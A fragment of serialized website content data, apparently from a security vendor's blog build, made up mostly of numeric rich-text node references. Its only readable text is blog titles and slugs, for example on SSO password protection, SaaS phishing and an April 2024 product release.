"content":251309},{},[251310],{"nodeType":173,"value":222208,"marks":251311,"data":251312},[],{},{"nodeType":1661,"data":251314,"content":251315},{},[251316],{"nodeType":178,"data":251317,"content":251318},{},[251319],{"nodeType":173,"value":221762,"marks":251320,"data":251321},[],{},{"nodeType":1661,"data":251323,"content":251324},{},[251325],{"nodeType":178,"data":251326,"content":251327},{},[251328],{"nodeType":173,"value":221772,"marks":251329,"data":251330},[],{},{"nodeType":1657,"data":251332,"content":251333},{},[251334,251354,251374,251383],{"nodeType":1687,"data":251335,"content":251336},{},[251337],{"nodeType":178,"data":251338,"content":251339},{},[251340,251344,251351],{"nodeType":173,"value":37,"marks":251341,"data":251343},[251342],{"type":194},{},{"nodeType":186,"data":251345,"content":251346},{"uri":114964},[251347],{"nodeType":173,"value":223354,"marks":251348,"data":251350},[251349],{"type":194},{},{"nodeType":173,"value":37,"marks":251352,"data":251353},[],{},{"nodeType":1687,"data":251355,"content":251356},{},[251357],{"nodeType":178,"data":251358,"content":251359},{},[251360,251364,251371],{"nodeType":173,"value":37,"marks":251361,"data":251363},[251362],{"type":194},{},{"nodeType":186,"data":251365,"content":251366},{"uri":114964},[251367],{"nodeType":173,"value":223375,"marks":251368,"data":251370},[251369],{"type":194},{},{"nodeType":173,"value":37,"marks":251372,"data":251373},[],{},{"nodeType":1687,"data":251375,"content":251376},{},[251377],{"nodeType":178,"data":251378,"content":251379},{},[251380],{"nodeType":173,"value":222278,"marks":251381,"data":251382},[],{},{"nodeType":1687,"data":251384,"content":251385},{},[251386],{"nodeType":178,"data":251387,"content":251388},{},[251389],{"nodeType":173,"value":223398,"marks":251390,"data":251391},[],{},{"nodeType":1657,"data":251393,"content":251394},{},[251395,251414,251435,251444],{"nodeType":1687,"data":251396,"content":251397},{},[251398],{"nodeType":178,"data":251399,"content":251400},{},[251401,251404,251411],{"nodeType":173,"value":37,"marks":251402,"data":251403},[],{},{"nodeType":186,"data":251405,"content":251406},{"uri":223415},[251407],{"nodeType":173,"value":223418,"marks":251408,"data":251410},[251409],{"type":194},{},{"nodeType":173,"value":37,"marks":251412,"data":251413},[],{},{"nodeType":1687,"data":251415,"content":251416},{},[251417],{"nodeType":178,"data":251418,"content":251419},{},[251420,251424,251431],{"nodeType":173,"value":37,"marks":251421,"data":251423},[251422],{"type":194},{},{"nodeType":186,"data":251425,"content":251426},{"uri":223415},[251427],{"nodeType":173,"value":223439,"marks":251428,"data":251430},[251429],{"type":194},{},{"nodeType":173,"value":37,"marks":251432,"data":251434},[251433],{"type":194},{},{"nodeType":1687,"data":251436,"content":251437},{},[251438],{"nodeType":178,"data":251439,"content":251440},{},[251441],{"nodeType":173,"value":223454,"marks":251442,"data":251443},[],{},{"nodeType":1687,"data":251445,"content":251446},{},[251447],{"nodeType":178,"data":251448,"content":251449},{},[251450],{"nodeType":173,"value":223464,"marks":251451,"data":251452},[],{},{"nodeType":231,"data":251454,"content":251455},{},[],{"nodeType":169,"data":251457,"content":251458},{},[251459],{"nodeType":173,"value":223474,"marks":251460,"data":251461},[],{},{"nodeType":178,"data":251463,"content":251464},{},[251465],{"nodeType":173,"value":223481,"marks":251466,"data":251467},[],{},{"nodeType":235,"data":251469,"content":251470},{},[251471],{"nodeType":173,"value":223488,"marks":251472,"data":251473},[],{},{"nodeType":250,"data":251475,"content":251476},{},[251477,251486,251495,251504,251513,251522,251531],{"nodeType":254,"data":251478,"content":251479},{},[251480],{"nodeType":178,"data":251481,"content":251482},{},[251483],{"nodeType":173,"value":223501,"marks":251484,"data":251485},[],{},{"nodeType":254,"data":251487,"content":251488},{},[251489],{"nodeType":178,"data":251490,"content":251491},{},[251492],{"nodeType":173,"value":223511,"marks":251493,"data":251494},[],{},{"nodeType":254,"data":251496,"content":251497},{},[251498],{"nodeType":178,"data":251499,"content":251500},{},[251501],{"nodeType":173,"value":223521,"marks":251502,"data":251503},[],{},{"nodeType":254,"data":251505,"content":251506},{},[251507],{"nodeType":178,"data":251508,"content":251509},{},[251510],{"nodeType":173,"value":223531,"marks":251511,"data":251512},[],{},{"nodeType":254,"data":251514,"content":251515},{},[251516],{"nodeType":178,"data":251517,"content":251518},{},[251519],{"nodeType":173,"value":223541,"marks":251520,"data":251521},[],{},{"nodeType":254,"data":251523,"content":251524},{},[251525],{"nodeType":178,"data":251526,"content":251527},{},[251528],{"nodeType":173,"value":223551,"marks":251529,"data":251530},[],{},{"nodeType":254,"data":251532,"content":251533},{},[251534],{"nodeType":178,"data":251535,"content":251536},{},[251537],{"nodeType":173,"value":223561,"marks":251538,"data":251539},[],{},{"nodeType":235,"data":251541,"content":251542},{},[251543],{"nodeType":173,"value":223568,"marks":251544,"data":251545},[],{},{"nodeType":250,"data":251547,"content":251548},{},[251549,251558,251567],{"nodeType":254,"data":251550,"content":251551},{},[251552],{"nodeType":178,"data":251553,"content":251554},{},[251555],{"nodeType":173,"value":223581,"marks":251556,"data":251557},[],{},{"nodeType":254,"data":251559,"content":251560},{},[251561],{"nodeType":178,"data":251562,"content":251563},{},[251564],{"nodeType":173,"value":223591,"marks":251565,"data":251566},[],{},{"nodeType":254,"data":251568,"content":251569},{},[251570],{"nodeType":178,"data":251571,"content":251572},{},[251573],{"nodeType":173,"value":223601,"marks":251574,"data":251575},[],{},{"nodeType":235,"data":251577,"content":251578},{},[251579],{"nodeType":173,"value":223608,"marks":251580,"data":251581},[],{},{"nodeType":250,"data":251583,"content":251584},{},[251585,251594,251603],{"nodeType":254,"data":251586,"content":251587},{},[251588],{"nodeType":178,"data":251589,"content":251590},{},[251591],{"nodeType":173,"value":223621,"marks":251592,"data":251593},[],{},{"nodeType":254,"data":251595,"content":251596},{},[251597],{"nodeType":178,"data":251598,"content":251599},{},[251600],{"nodeType":173,"value":223631,"marks":251601,"data":251602},[],{},{"nodeType":254,"data":251604,"content":251605},{},[251606],{"nodeType":178,"data":251607,"content":251608},{},[251609],{"nodeType":173,"value":223641,"marks":251610,"data":251611},[],{},{"nodeType":235,"data":251613,"content":251614},{},[251615],{"nodeType":173,"value":222177,"marks":251616,"data":251617},[],{},{"nodeType":178,"data":251619,"content":251620},{},[251621],{"nodeType":173,"value":221726,"marks":251622,"data":251623},[],{},{"nodeType":1653,"data":251625,"content":251626},{},[251627,251666,251725,251784],{"nodeType":1657,"data":251628,"content":251629},{},[251630,251639,251648,251657],{"nodeType":1661,"data":251631,"content":251632},{},[251633],{"nodeType":178,"data":251634,"content":251635},{},[251636],{"nodeType":173,"value":221742,"marks":251637,"data":251638},[],{},{"nodeType":1661,"data":251640,"content":251641},{},[251642],{"nodeType":178,"data":251643,"content":251644},{},[251645],{"nodeType":173,"value":222208,"marks":251646,"data":251647},[],{},{"nodeType":1661,"data":251649,"content":251650},{},[251651],{"nodeType":178,"data":251652,"content":251653},{},[251654],{"nodeType":173,"value":221762,"marks":251655,"data":251656},[],{},{"nodeType":1661,"data":251658,"content":251659},{},[251660],{"nodeType":178,"data":251661,"content":251662},{},[251663],{"nodeType":173,"value":221772,"marks":251664,"data":251665},[],{},{"nodeType":1657,"data":251667,"content":251668},{},[251669,251688,251707,251716],{"nodeType":1687,"data":251670,"content":251671},{},[251672],{"nodeType":178,"data":251673,"content":251674},{},[251675,251678,251685],{"nodeType":173,"value":37,"marks":251676,"data":251677},[],{},{"nodeType":186,"data":251679,"content":251680},{"uri":197917},[251681],{"nodeType":173,"value":222369,"marks":251682,"data":251684},[251683],{"type":194},{},{"nodeType":173,"value":37,"marks":251686,"data":251687},[],{},{"nodeType":1687,"data":251689,"content":251690},{},[251691],{"nodeType":178,"data":251692,"content":251693},{},[251694,251697,251704],{"nodeType":173,"value":37,"marks":251695,"data":251696},[],{},{"nodeType":186,"data":251698,"content":251699},{"uri":197917},[251700],{"nodeType":173,"value":222389,"marks":251701,"data":251703},[251702],{"type":194},{},{"nodeType":173,"value":37,"marks":251705,"data":251706},[],{},{"nodeType":1687,"data":251708,"content":251709},{},[251710],{"nodeType":178,"data":251711,"content":251712},{},[251713],{"nodeType":173,"value":223746,"marks":251714,"data":251715},[],{},{"nodeType":1687,"data":251717,"content":251718},{},[251719],{"nodeType":178,"data":251720,"content":251721},{},[251722],{"nodeType":173,"value":222413,"marks":251723,"data":251724},[],{},{"nodeType":1657,"data":251726,"content":251727},{},[251728,251747,251766,251775],{"nodeType":1687,"data":251729,"content":251730},{},[251731],{"nodeType":178,"data":251732,"content":251733},{},[251734,251737,251744],{"nodeType":173,"value":37,"marks":251735,"data":251736},[],{},{"nodeType":186,"data":251738,"content":251739},{"uri":59347},[251740],{"nodeType":173,"value":223774,"marks":251741,"data":251743},[251742],{"type":194},{},{"nodeType":173,"value":37,"marks":251745,"data":251746},[],{},{"nodeType":1687,"data":251748,"content":251749},{},[251750],{"nodeType":178,"data":251751,"content":251752},{},[251753,251756,251763],{"nodeType":173,"value":37,"marks":251754,"data":251755},[],{},{"nodeType":186,"data":251757,"content":251758},{"uri":59347},[251759],{"nodeType":173,"value":59350,"marks":251760,"data":251762},[251761],{"type":194},{},{"nodeType":173,"value":37,"marks":251764,"data":251765},[],{},{"nodeType":1687,"data":251767,"content":251768},{},[251769],{"nodeType":178,"data":251770,"content":251771},{},[251772],{"nodeType":173,"value":223807,"marks":251773,"data":251774},[],{},{"nodeType":1687,"data":251776,"content":251777},{},[251778],{"nodeType":178,"data":251779,"content":251780},{},[251781],{"nodeType":173,"value":223817,"marks":251782,"data":251783},[],{},{"nodeType":1657,"data":251785,"content":251786},{},[251787,251806,251825,251834],{"nodeType":1687,"data":251788,"content":251789},{},[251790],{"nodeType":178,"data":251791,"content":251792},{},[251793,251796,251803],{"nodeType":173,"value":37,"marks":251794,"data":251795},[],{},{"nodeType":186,"data":251797,"content":251798},{"uri":223834},[251799],{"nodeType":173,"value":223837,"marks":251800,"data":251802},[251801],{"type":194},{},{"nodeType":173,"value":37,"marks":251804,"data":251805},[],{},{"nodeType":1687,"data":251807,"content":251808},{},[251809],{"nodeType":178,"data":251810,"content":251811},{},[251812,251815,251822],{"nodeType":173,"value":37,"marks":251813,"data":251814},[],{},{"nodeType":186,"data":251816,"content":251817},{"uri":223834},[251818],{"nodeType":173,"value":223857,"marks":251819,"data":251821},[251820],{"type":194},{},{"nodeType":173,"value":37,"marks":251823,"data":251824},[],{},{"nodeType":1687,"data":251826,"content":251827},{},[251828],{"nodeType":178,"data":251829,"content":251830},{},[251831],{"nodeType":173,"value":223871,"marks":251832,"data":251833},[],{},{"nodeType":1687,"data":251835,"content":251836},{},[251837],{"nodeType":178,"data":251838,"content":251839},{},[251840],{"nodeType":173,"value":223881,"marks":251841,"data":251842},[],{},{"nodeType":231,"data":251844,"content":251845},{},[],{"nodeType":169,"data":251847,"content":251848},{},[251849],{"nodeType":173,"value":223891,"marks":251850,"data":251851},[],{},{"nodeType":235,"data":251853,"content":251854},{},[251855],{"nodeType":173,"value":223898,"marks":251856,"data":251857},[],{},{"nodeType":178,"data":251859,"content":251860},{},[251861],{"nodeType":173,"value":223905,"marks":251862,"data":251863},[],{},{"nodeType":178,"data":251865,"content":251866},{},[251867],{"nodeType":173,"value":223912,"marks":251868,"data":251869},[],{},{"nodeType":231,"data":251871,"content":251872},{},[],{"nodeType":235,"data":251874,"content":251875},{},[251876],{"nodeType":173,"value":223922,"marks":251877,"data":251878},[],{},{"nodeType":178,"data":251880,"content":251881},{},[251882],{"nodeType":173,"value":223929,"marks":251883,"data":251884},[],{},{"nodeType":178,"data":251886,"content":251887},{},[251888],{"nodeType":173,"value":223936,"marks":251889,"data":251890},[],{},{"nodeType":231,"data":251892,"content":251893},{},[],{"nodeType":235,"data":251895,"content":251896},{},[251897],{"nodeType":173,"value":223946,"marks":251898,"data":251899},[],{},{"nodeType":178,"data":251901,"content":251902},{},[251903],{"nodeType":173,"value":223953,"marks":251904,"data":251905},[],{},{"nodeType":178,"data":251907,"content":251908},{},[251909],{"nodeType":173,"value":223960,"marks":251910,"data":251911},[],{},{"nodeType":178,"data":251913,"content":251914},{},[251915],{"nodeType":173,"value":223967,"marks":251916,"data":251917},[],{},{"items":251919},[251920,251922],{"sys":251921,"name":505},{"id":504},{"sys":251923,"name":509},{"id":508},{"items":251925},[251926],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":251927},{"url":1496},{"url":251929},"https://images.ctfassets.net/y1cdw1ablpvd/5TslIHxoG23y68QNcwgc9o/c473968cf99cfc0a999895649a50ba7d/Introducing.png",{"items":251931},[251932],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":251933},{"url":516},{"json":251935,"links":252396},{"data":251936,"content":251937,"nodeType":165},{},[251938,251944,251949,251955,251961,251974,252003,252009,252016,252021,252034,252041,252046,252052,252058,252064,252070,252077,252083,252098,252111,252116,252122,252137,252154,252160,252180,252186,252207,252220,252226,252243,252249,252314,252320,252333,252339,252345,252351,252357,252370,252375,252381],{"data":251939,"content":251940,"nodeType":178},{},[251941],{"data":251942,"marks":251943,"value":37,"nodeType":173},{},[],{"data":251945,"content":251948,"nodeType":312},{"target":251946},{"sys":251947},{"id":235737,"type":317,"linkType":318},[],{"data":251950,"content":251951,"nodeType":178},{},[251952],{"data":251953,"marks":251954,"value":235745,"nodeType":173},{},[],{"data":251956,"content":251957,"nodeType":178},{},[251958],{"data":251959,"marks":251960,"value":235752,"nodeType":173},{},[],{"data":251962,"content":251963,"nodeType":178},{},[251964,251967,251971],{"data":251965,"marks":251966,"value":235759,"nodeType":173},{},[],{"data":251968,"marks":251969,"value":235764,"nodeType":173},{},[251970],{"type":370},{"data":251972,"marks":251973,"value":39946,"nodeType":173},{},[],{"data":251975,"content":251976,"nodeType":250},{},[251977,251990],{"data":251978,"content":251979,"nodeType":254},{},[251980],{"data":251981,"content":251982,"nodeType":178},{},[251983,251987],{"data":251984,"marks":251985,"value":235781,"nodeType":173},{},[251986],{"type":370},{"data":251988,"marks":251989,"value":235785,"nodeType":173},{},[],{"data":251991,"content":251992,"nodeType":254},{},[251993],{"data":251994,"content":251995,"nodeType":178},{},[251996,252000],{"data":251997,"marks":251998,"value":235796,"nodeType":173},{},[251999],{"type":370},{"data":252001,"marks":252002,"value":235800,"nodeType":173},{},[],{"data":252004,"content":252005,"nodeType":178},{},[252006],{"data":252007,"marks":252008,"value":235807,"nodeType":173},{},[],{"data":252010,"content":252011,"nodeType":178},{},[252012],{"data":252013,"marks":252014,"value":235815,"nodeType":173},{},[252015],{"type":370},{"data":252017,"content":252020,"nodeType":312},{"target":252018},{"sys":252019},{"id":227773,"type":317,"linkType":318},[],{"data":252022,"content":252023,"nodeType":178},{},[252024,252027,252031],{"data":252025,"marks":252026,"value":235827,"nodeType":173},{},[],{"data":252028,"marks":252029,"value":125683,"nodeType":173},{},[252030],{"type":370},{"data":252032,"marks":252033,"value":235835,"nodeType":173},{},[],{"data":252035,"content":252036,"nodeType":178},{},[252037],{"data":252038,"marks":252039,"value":235843,"nodeType":173},{},[252040],{"type":370},{"data":252042,"content":252045,"nodeType":312},{"target":252043},{"sys":252044},{"id":235848,"type":317,"linkType":318},[],{"data":252047,"content":252048,"nodeType":235},{},[252049],{"data":252050,"marks":252051,"value":235856,"nodeType":173},{},[],{"data":252053,"content":252054,"nodeType":178},{},[252055],{"data":252056,"marks":252057,"value":235863,"nodeType":173},{},[],{"data":252059,"content":252060,"nodeType":178},{},[252061],{"data":252062,"marks":252063,"value":235870,"nodeType":173},{},[],{"data":252065,"content":252066,"nodeType":178},{},[252067],{"data":252068,"marks":252069,"value":235877,"nodeType":173},{},[],{"data":252071,"content":252072,"nodeType":178},{},[252073],{"data":252074,"marks":252075,"value":235885,"nodeType":173},{},[252076],{"type":370},{"data":252078,"content":252079,"nodeType":178},{},[252080],{"data":252081,"marks":252082,"value":235892,"nodeType":173},{},[],{"data":252084,"content":252085,"nodeType":178},{},[252086,252089,252095],{"data":252087,"marks":252088,"value":196087,"nodeType":173},{},[],{"data":252090,"content":252091,"nodeType":186},{"uri":183466},[252092],{"data":252093,"marks":252094,"value":155030,"nodeType":173},{},[],{"data":252096,"marks":252097,"value":196097,"nodeType":173},{},[],{"data":252099,"content":252100,"nodeType":178},{},[252101,252104,252108],{"data":252102,"marks":252103,"value":235914,"nodeType":173},{},[],{"data":252105,"marks":252106,"value":235919,"nodeType":173},{},[252107],{"type":370},{"data":252109,"marks":252110,"value":235923,"nodeType":173},{},[],{"data":252112,"content":252115,"nodeType":312},{"target":252113},{"sys":252114},{"id":24862,"type":317,"linkType":318},[],{"data":252117,"content":252118,"nodeType":178},{},[252119],{"data":252120,"marks":252121,"value":235935,"nodeType":173},{},[],{"data":252123,"content":252124,"nodeType":178},{},[252125,252128,252134],{"data":252126,"marks":252127,"value":235942,"nodeType":173},{},[],{"data":252129,"content":252130,"nodeType":186},{"uri":114007},[252131],{"data":252132,"marks":252133,"value":235949,"nodeType":173},{},[],{"data":252135,"marks":252136,"value":235953,"nodeType":173},{},[],{"data":252138,"content":252139,"nodeType":178},{},[252140,252143,252151],{"data":252141,"marks":252142,"value":235960,"nodeType":173},{},[],{"data":252144,"content":252147,"nodeType":1698},{"target":252145},{"sys":252146},{"id":2405,"type":317,"linkType":318},[252148],{"data":252149,"marks":252150,"value":21642,"nodeType":173},{},[],{"data":252152,"marks":252153,"value":1477,"nodeType":173},{},[],{"data":252155,"content":252156,"nodeType":235},{},[252157],{"data":252158,"marks":252159,"value":235978,"nodeType":173},{},[],{"data":252161,"content":252162,"nodeType":178},{},[252163,252166,252170,252173,252177],{"data":252164,"marks":252165,"value":235985,"nodeType":173},{},[],{"data":252167,"marks":252168,"value":182376,"nodeType":173},{},[252169],{"type":370},{"data":252171,"marks":252172,"value":933,"nodeType":173},{},[],{"data":252174,"marks":252175,"value":235997,"nodeType":173},{},[252176],{"type":370},{"data":252178,"marks":252179,"value":236001,"nodeType":173},{},[],{"data":252181,"content":252182,"nodeType":178},{},[252183],{"data":252184,"marks":252185,"value":236008,"nodeType":173},{},[],{"data":252187,"content":252188,"nodeType":250},{},[252189,252198],{"data":252190,"content":252191,"nodeType":254},{},[252192],{"data":252193,"content":252194,"nodeType":178},{},[252195],{"data":252196,"marks":252197,"value":236021,"nodeType":173},{},[],{"data":252199,"content":252200,"nodeType":254},{},[252201],{"data":252202,"content":252203,"nodeType":178},{},[252204],{"data":252205,"marks":252206,"value":236031,"nodeType":173},{},[],{"data":252208,"content":252209,"nodeType":178},{},[252210,252213,252217],{"data":252211,"marks":252212,"value":236038,"nodeType":173},{},[],{"data":252214,"marks":252215,"value":236043,"nodeType":173},{},[252216],{"type":1646},{"data":252218,"marks":252219,"value":236047,"nodeType":173},{},[],{"data":252221,"content":252222,"nodeType":235},{},[252223],{"data":252224,"marks":252225,"value":236054,"nodeType":173},{},[],{"data":252227,"content":252228,"nodeType":178},{},[252229,252232,252240],{"data":252230,"marks":252231,"value":236061,"nodeType":173},{},[],{"data":252233,"content":252236,"nodeType":1698},{"target":252234},{"sys":252235},{"id":202170,"type":317,"linkType":318},[252237],{"data":252238,"marks":252239,"value":195823,"nodeType":173},{},[],{"data":252241,"marks":252242,"value":236073,"nodeType":173},{},[],{"data":252244,"content":252245,"nodeType":178},{},[252246],{"data":252247,"marks":252248,"value":236080,"nodeType":173},{},[],{"data":252250,"content":252251,"nodeType":250},{},[252252,252272],{"data":252253,"content":252254,"nodeType":254},{},[252255],{"data":252256,"content":252257,"nodeType":178},{},[252258,252261,252269],{"data":252259,"marks":252260,"value":236093,"nodeType":173},{},[],{"data":252262,"content":252265,"nodeType":1698},{"target":252263},{"sys":252264},{"id":202170,"type":317,"linkType":318},[252266],{"data":252267,"marks":252268,"value":236102,"nodeType":173},{},[],{"data":252270,"marks":252271,"value":1477,"nodeType":173},{},[],{"data":252273,"content":252274,"nodeType":254},{},[252275],{"data":252276,"content":252277,"nodeType":178},{},[252278,252281,252289,252292,252300,252303,252311],{"data":252279,"marks":252280,"value":236115,"nodeType":173},{},[],{"data":252282,"content":252285,"nodeType":1698},{"target":252283},{"sys":252284},{"id":228244,"type":317,"linkType":318},[252286],{"data":252287,"marks":252288,"value":63256,"nodeType":173},{},[],{"data":252290,"marks":252291,"value":236127,"nodeType":173},{},[],{"data":252293,"content":252296,"nodeType":1698},{"target":252294},{"sys":252295},{"id":236132,"type":317,"linkType":318},[252297],{"data":252298,"marks":252299,"value":226380,"nodeType":173},{},[],{"data":252301,"marks":252302,"value":933,"nodeType":173},{},[],{"data":252304,"content":252307,"nodeType":1698},{"target":252305},{"sys":252306},{"id":236144,"type":317,"linkType":318},[252308],{"data":252309,"marks":252310,"value":226391,"nodeType":173},{},[],{"data":252312,"marks":252313,"value":236152,"nodeType":173},{},[],{"data":252315,"content":252316,"nodeType":235},{},[252317],{"data":252318,"marks":252319,"value":236159,"nodeType":173},{},[],{"data":252321,"content":252322,"nodeType":178},{},[252323,252326,252330],{"data":252324,"marks":252325,"value":236166,"nodeType":173},{},[],{"data":252327,"marks":252328,"value":236171,"nodeType":173},{},[252329],{"type":370},{"data":252331,"marks":252332,"value":236175,"nodeType":173},{},[],{"data":252334,"content":252335,"nodeType":178},{},[252336],{"data":252337,"marks":252338,"value":236182,"nodeType":173},{},[],{"data":252340,"content":252341,"nodeType":178},{},[252342],{"data":252343,"marks":252344,"value":236189,"nodeType":173},{},[],{"data":252346,"content":252347,"nodeType":178},{},[252348],{"data":252349,"marks":252350,"value":236196,"nodeType":173},{},[],{"data":252352,"content":252353,"nodeType":178},{},[252354],{"data":252355,"marks":252356,"value":236203,"nodeType":173},{},[],{"data":252358,"content":252359,"nodeType":178},{},[252360,252363,252367],{"data":252361,"marks":252362,"value":236210,"nodeType":173},{},[],{"data":252364,"marks":252365,"value":236215,"nodeType":173},{},[252366],{"type":370},{"data":252368,"marks":252369,"value":236219,"nodeType":173},{},[],{"data":252371,"content":252374,"nodeType":312},{"target":252372},{"sys":252373},{"id":236224,"type":317,"linkType":318},[],{"data":252376,"content":252377,"nodeType":235},{},[252378],{"data":252379,"marks":252380,"value":71801,"nodeType":173},{},[],{"data":252382,"content":252383,"nodeType":178},{},[252384,252387,252393],{"data":252385,"marks":252386,"value":114452,"nodeType":173},{},[],{"data":252388,"content":252389,"nodeType":186},{"uri":473},[252390],{"data":252391,"marks":252392,"value":88194,"nodeType":173},{},[],{"data":252394,"marks":252395,"value":236247,"nodeType":173},{},[],{"entries":252397},{"inline":252398,"hyperlink":252399,"block":252416},[],[252400,252402,252404,252408,252412],{"sys":252401,"__typename":6655,"title":6676,"slug":6677,"articleId":6678},{"id":2405},{"sys":252403,"__typename":1528,"title":223970,"slug":223973},{"id":202170},{"sys":252405,"__typename":1528,"title":252406,"slug":252407},{"id":228244},"SAMLjacking a poisoned tenant","samljacking-a-poisoned-tenant",{"sys":252409,"__typename":1528,"title":252410,"slug":252411},{"id":236132},"Slack Attack: A phisher's guide to initial access","slack-phishing-for-initial-access",{"sys":252413,"__typename":1528,"title":252414,"slug":252415},{"id":236144},"Phishing Microsoft Teams for initial access","phishing-microsoft-teams-for-initial-access",[252417,252422,252424,252427,252430],{"sys":252418,"__typename":127689,"title":252419,"youTubeUrl":252420,"imagePlaceholder":252421},{"id":235737},"Introducing SSO Password Protection","https://www.youtube.com/watch?v=hAly53lEIec",{"url":251929,"width":5399,"height":5400},{"sys":252423,"__typename":15269,"type":112637,"ctaText":236618,"buttonLabel":93499,"buttonColour":152046,"buttonUrl":118},{"id":227773},{"sys":252425,"__typename":5434,"title":231703,"arcadeDemoUrl":252426,"playText":51639},{"id":235848},"https://demo.arcade.software/qJsOW0oEo1QmMpfP0IWr?embed",{"sys":252428,"__typename":5345,"title":46397,"caption":118,"layoutMode":118,"file":252429},{"id":24862},{"url":46399,"width":11967,"height":46400},{"sys":252431,"__typename":5345,"title":252432,"caption":118,"layoutMode":118,"file":252433},{"id":236224},"Mailchimp and AWS password",{"url":252434,"width":252435,"height":252436},"https://images.ctfassets.net/y1cdw1ablpvd/7vxUyG9kDG3IpMA6R4y49j/c49597ce9f85da94f5edc771f4dc817f/image__8_-min.png",1369,899,"content:blog:introducing-sso-password-protection.json","blog/introducing-sso-password-protection.json","blog/introducing-sso-password-protection",{"_path":252441,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":252442,"ogImage":118,"summary":252444,"title":220517,"subtitle":118,"metaTitle":252455,"synopsis":220518,"hashTags":118,"publishedDate":220519,"slug":220520,"tagsCollection":252456,"relatedBlogPostsCollection":252460,"authorsCollection":252961,"content":252965,"_id":253145,"_type":5439,"_source":5440,"_file":253146,"_stem":253147,"_extension":5439},"/blog/product-release-april-2024",{"id":220337,"publishedAt":252443},"2024-04-17T16:17:48.139Z",{"json":252445},{"data":252446,"content":252447,"nodeType":165},{},[252448],{"data":252449,"content":252450,"nodeType":178},{},[252451],{"data":252452,"marks":252453,"value":252454,"nodeType":173},{},[],"Get faster insights with the Push dashboard, integrate with Okta to enrich your data, and try the new 'acknowledge' mode for app banners","Push Security new product features for April 2024",{"items":252457},[252458],{"sys":252459,"name":18399},{"id":18398},{"items":252461},[252462,252690],{"__typename":1528,"sys":252463,"content":252464,"title":245566,"synopsis":245567,"hashTags":118,"publishedDate":245568,"slug":245569,"tagsCollection":252682,"authorsCollection":252686},{"id":245323},{"json":252465},{"data":252466,"content":252467,"nodeType":165},{},[252468,252474,252513,252519,252525,252530,252547,252553,252573,252578,252595,252601,252607,252613,252628,252634,252647,252660,252665],{"data":252469,"content":252470,"nodeType":235},{},[252471],{"data":252472,"marks":252473,"value":220348,"nodeType":173},{},[],{"data":252475,"content":252476,"nodeType":250},{},[252477,252486,252495,252504],{"data":252478,"content":252479,"nodeType":254},{},[252480],{"data":252481,"content":252482,"nodeType":178},{},[252483],{"data":252484,"marks":252485,"value":245346,"nodeType":173},{},[],{"data":252487,"content":252488,"nodeType":254},{},[252489],{"data":252490,"content":252491,"nodeType":178},{},[252492],{"data":252493,"marks":252494,"value":245356,"nodeType":173},{},[],{"data":252496,"content":252497,"nodeType":254},{},[252498],{"data":252499,"content":252500,"nodeType":178},{},[252501],{"data":252502,"marks":252503,"value":245366,"nodeType":173},{},[],{"data":252505,"content":252506,"nodeType":254},{},[252507],{"data":252508,"content":252509,"nodeType":178},{},[252510],{"data":252511,"marks":252512,"value":245376,"nodeType":173},{},[],{"data":252514,"content":252515,"nodeType":235},{},[252516],{"data":252517,"marks":252518,"value":245346,"nodeType":173},{},[],{"data":252520,"content":252521,"nodeType":178},{},[252522],{"data":252523,"marks":252524,"value":245389,"nodeType":173},{},[],{"data":252526,"content":252529,"nodeType":312},{"target":252527},{"sys":252528},{"id":245394,"type":317,"linkType":318},[],{"data":252531,"content":252532,"nodeType":178},{},[252533,252536,252544],{"data":252534,"marks":252535,"value":37,"nodeType":173},{},[],{"data":252537,"content":252540,"nodeType":1698},{"target":252538},{"sys":252539},{"id":245406,"type":317,"linkType":318},[252541],{"data":252542,"marks":252543,"value":18605,"nodeType":173},{},[],{"data":252545,"marks":252546,"value":37,"nodeType":173},{},[],{"data":252548,"content":252549,"nodeType":235},{},[252550],{"data":252551,"marks":252552,"value":245356,"nodeType":173},{},[],{"data":252554,"content":252555,"nodeType":178},{},[252556,252559,252563,252566,252570],{"data":252557,"marks":252558,"value":245426,"nodeType":173},{},[],{"data":252560,"marks":252561,"value":245431,"nodeType":173},{},[252562],{"type":370},{"data":252564,"marks":252565,"value":245435,"nodeType":173},{},[],{"data":252567,"marks":252568,"value":2789,"nodeType":173},{},[252569],{"type":370},{"data":252571,"marks":252572,"value":245443,"nodeType":173},{},[],{"data":252574,"content":252577,"nodeType":312},{"target":252575},{"sys":252576},{"id":245448,"type":317,"linkType":318},[],{"data":252579,"content":252580,"nodeType":178},{},[252581,252584,252592],{"data":252582,"marks":252583,"value":37,"nodeType":173},{},[],{"data":252585,"content":252588,"nodeType":1698},{"target":252586},{"sys":252587},{"id":245460,"type":317,"linkType":318},[252589],{"data":252590,"marks":252591,"value":189115,"nodeType":173},{},[],{"data":252593,"marks":252594,"value":37,"nodeType":173},{},[],{"data":252596,"content":252597,"nodeType":235},{},[252598],{"data":252599,"marks":252600,"value":245474,"nodeType":173},{},[],{"data":252602,"content":252603,"nodeType":178},{},[252604],{"data":252605,"marks":252606,"value":245481,"nodeType":173},{},[],{"data":252608,"content":252609,"nodeType":178},{},[252610],{"data":252611,"marks":252612,"value":245488,"nodeType":173},{},[],{"data":252614,"content":252615,"nodeType":178},{},[252616,252619,252625],{"data":252617,"marks":252618,"value":37,"nodeType":173},{},[],{"data":252620,"content":252621,"nodeType":186},{"uri":71635},[252622],{"data":252623,"marks":252624,"value":18605,"nodeType":173},{},[],{"data":252626,"marks":252627,"value":37,"nodeType":173},{},[],{"data":252629,"content":252630,"nodeType":235},{},[252631],{"data":252632,"marks":252633,"value":245510,"nodeType":173},{},[],{"data":252635,"content":252636,"nodeType":178},{},[252637,252640,252644],{"data":252638,"marks":252639,"value":245517,"nodeType":173},{},[],{"data":252641,"marks":252642,"value":245522,"nodeType":173},{},[252643],{"type":370},{"data":252645,"marks":252646,"value":245526,"nodeType":173},{},[],{"data":252648,"content":252649,"nodeType":178},{},[252650,252653,252657],{"data":252651,"marks":252652,"value":245533,"nodeType":173},{},[],{"data":252654,"marks":252655,"value":245522,"nodeType":173},{},[252656],{"type":370},{"data":252658,"marks":252659,"value":245541,"nodeType":173},{},[],{"data":252661,"content":252664,"nodeType":312},{"target":252662},{"sys":252663},{"id":245546,"type":317,"linkType":318},[],{"data":252666,"content":252667,"nodeType":178},{},[252668,252671,252679],{"data":252669,"marks":252670,"value":37,"nodeType":173},{},[],{"data":252672,"content":252675,"nodeType":1698},{"target":252673},{"sys":252674},{"id":245558,"type":317,"linkType":318},[252676],{"data":252677,"marks":252678,"value":189115,"nodeType